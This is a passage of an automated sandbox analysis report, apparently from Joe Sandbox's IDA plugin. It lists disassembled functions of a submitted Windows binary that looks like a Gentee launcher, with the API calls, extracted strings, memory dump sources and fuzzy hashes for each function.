                                            • Associated: 00000000.00000002.2109662170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109685375.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109696404.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109707809.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                            • String ID:
                                            • API String ID: 801014965-0
                                            • Opcode ID: 143c9e8dcc1ab551373f0120bfaca85027ae735a0a25819c23ff821b8df6a2f8
                                            • Instruction ID: 9889600cf3eb4391f8ce6d24981125143470c5a89cbfe14180cb2d50d5b3fc35
                                            • Opcode Fuzzy Hash: 143c9e8dcc1ab551373f0120bfaca85027ae735a0a25819c23ff821b8df6a2f8
                                            • Instruction Fuzzy Hash: 71417075800344AFDB209FA4DA49AAEBFB8FB09711F20013FE941B72E0D7785940CB98
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 1000436A
                                            • GetTickCount.KERNEL32 ref: 100043B9
                                              • Part of subcall function 10004240: vsprintf.MSVCRT ref: 10004258
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: CountTick$vsprintf
                                            • String ID: Press any key...$%s[ Line: %i Pos: %i ] $Compile error [ 0x%X %i ]: $Run-time error [ 0x%X %i ]: $Summary Time: %i:%i:%i
                                            • API String ID: 3964146895-2992983336
                                            • Opcode ID: fb219ae7bc5e3754048a8c75435143f0b73f70548fed37221171dea3b9a7ae21
                                            • Instruction ID: 5a03128a077f208a78a2de5e596b407fc28f85d3173b41968825e96d7eba73eb
                                            • Opcode Fuzzy Hash: fb219ae7bc5e3754048a8c75435143f0b73f70548fed37221171dea3b9a7ae21
                                            • Instruction Fuzzy Hash: CE3191F5B007009BF264EB58EC81E2B72E9DB842C4B468518FD468365DEE20FD54C665
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: _ftol
                                            • String ID:
                                            • API String ID: 2545261903-0
                                            • Opcode ID: f0b3429af6d82819c45c162e22c1f9801bdbca7f3417f1e8cbe6ddec54b0f969
                                            • Instruction ID: dbb1350d90862c38006c1f3f9d3ba85d2949ed274592c816424a895a3dde99f9
                                            • Opcode Fuzzy Hash: f0b3429af6d82819c45c162e22c1f9801bdbca7f3417f1e8cbe6ddec54b0f969
                                            • Instruction Fuzzy Hash: A991A8BA6086528AD704EF1EF8914DAFBA0EFE4726F54857BD6C482300E331457DCBA5
                                            APIs
                                            • CharLowerA.USER32(?), ref: 10004FAA
                                            • CharLowerA.USER32(00000000), ref: 10004FB3
                                            • CharLowerA.USER32(00000000), ref: 10004FC8
                                            • CharLowerA.USER32(00000000), ref: 10004FD5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: CharLower
                                            • String ID:
                                            • API String ID: 1615517891-0
                                            • Opcode ID: 285a1d7726aef36330d28cb51e1bb2515d9540c5ae1e0432bc58940cea301f56
                                            • Instruction ID: 803ff84b82c36d7cb0ac522535ba80d46392a79b4a5de3cf2bd2c6b7ac3af2e1
                                            • Opcode Fuzzy Hash: 285a1d7726aef36330d28cb51e1bb2515d9540c5ae1e0432bc58940cea301f56
                                            • Instruction Fuzzy Hash: 501129B55082830EE310CE759480ABFBBD9DF892C5F11483EE4D1C3106E912DC86D7A5
                                            APIs
                                            • GetConsoleMode.KERNEL32(FFFFFFFF,00000000,?,?,?,?,100043DF), ref: 10005EA3
                                            • SetConsoleMode.KERNEL32(FFFFFFFF,00000000,?,?,?,100043DF), ref: 10005EB8
                                            • ReadConsoleA.KERNEL32(FFFFFFFF,?,00000001,?,00000000,?,?,?,100043DF), ref: 10005ECF
                                            • SetConsoleMode.KERNEL32(FFFFFFFF,?,?,?,?,100043DF), ref: 10005EE1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: Console$Mode$Read
                                            • String ID:
                                            • API String ID: 109265299-0
                                            • Opcode ID: 83161c0ba534bb5bb16d501c264478f4720bd276e76e6166f4c934cfbf79780e
                                            • Instruction ID: 277fc34a9abc0aecee5556ef167951661a589cd638a54e99b0309d48df3b486c
                                            • Opcode Fuzzy Hash: 83161c0ba534bb5bb16d501c264478f4720bd276e76e6166f4c934cfbf79780e
                                            • Instruction Fuzzy Hash: DD01A275600329EFF310DB64CCC5FA773A9E784780F40460AFA54822E8DAB5E844CB72
                                            APIs
                                            • AllocConsole.KERNEL32 ref: 10005D8C
                                            • GetCPInfo.KERNEL32(00000000,?), ref: 10005D9B
                                            • GetStdHandle.KERNEL32(000000F5), ref: 10005DC9
                                            • GetStdHandle.KERNEL32(000000F6), ref: 10005DD2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: Handle$AllocConsoleInfo
                                            • String ID:
                                            • API String ID: 2979881050-0
                                            • Opcode ID: 79bd74d05196f55a5010c0ee49bf5578b07980fdf9a96f42d034c8fc4217eeeb
                                            • Instruction ID: 567dc61beafc005e892ce19f8db23f18483b42cedde438cadc3bdd48228512a6
                                            • Opcode Fuzzy Hash: 79bd74d05196f55a5010c0ee49bf5578b07980fdf9a96f42d034c8fc4217eeeb
                                            • Instruction Fuzzy Hash: E1F0B471C082358BF714DF68CC84B5B3BE4EB44790F11431BE855472A9D7314848CBA2
                                            APIs
                                            • lstrcmpA.KERNEL32(?,lzge_decode), ref: 004018A2
                                            • lstrcmpA.KERNEL32(?,launcher_get), ref: 004018B8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2109673953.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2109662170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109685375.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109696404.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109707809.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: lstrcmp
                                            • String ID: launcher_get$lzge_decode
                                            • API String ID: 1534048567-2981319874
                                            • Opcode ID: 5f1b5b9c6aa848f87772fa5498ba0eb44c79c04b265534716dc23dbc529ac21d
                                            • Instruction ID: b58090d80eb74edd8f84a636f1a44c18bb862bfbb85db56f3fac8cdddd56031d
                                            • Opcode Fuzzy Hash: 5f1b5b9c6aa848f87772fa5498ba0eb44c79c04b265534716dc23dbc529ac21d
                                            • Instruction Fuzzy Hash: 64D01763295621219211656EAC01EDB929D4AA5BA43068637F600F22E8C2BC9A8285AC
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: __aulldiv
                                            • String ID: PQXy$QRBx
                                            • API String ID: 3732870572-156971322
                                            • Opcode ID: 7d0c917905162821b20e92d50607446e16b6ec4d67759af67f5b776bd5cc88ce
                                            • Instruction ID: fecae9029ccbbfb1907bd0fd8daed38a12235495696e2410105cb9617baf31f9
                                            • Opcode Fuzzy Hash: 7d0c917905162821b20e92d50607446e16b6ec4d67759af67f5b776bd5cc88ce
                                            • Instruction Fuzzy Hash: EA61DDB6605A00CFD324CF5DE980916FBE5FF98721324CA6EE699CB760D732A810CB54
                                            APIs
                                              • Part of subcall function 10005C00: GetTempPathA.KERNEL32(00000400,?,?,00000400,00000000,10005C68,00000000,00000000,?,1000D32C,10006518,?,?,?,?,?), ref: 10005C18
                                            • GetTickCount.KERNEL32 ref: 10005C71
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: CountPathTempTick
                                            • String ID: %s%cgentee%02X.tmp$c:\temp
                                            • API String ID: 536023709-1620203176
                                            • Opcode ID: 9545025e1248976237a9ac63636d111ce3a4898ca4c58a7d92d227503dd02c18
                                            • Instruction ID: 64502b199535dded57bf49a6d61c7b50f0ce444720b67ce1b81255a0c8b663d4
                                            • Opcode Fuzzy Hash: 9545025e1248976237a9ac63636d111ce3a4898ca4c58a7d92d227503dd02c18
                                            • Instruction Fuzzy Hash: 6721A4B9D00310AAF210FBB49C86FBF3198DB047D5FC10526FA459219EEB35AA048777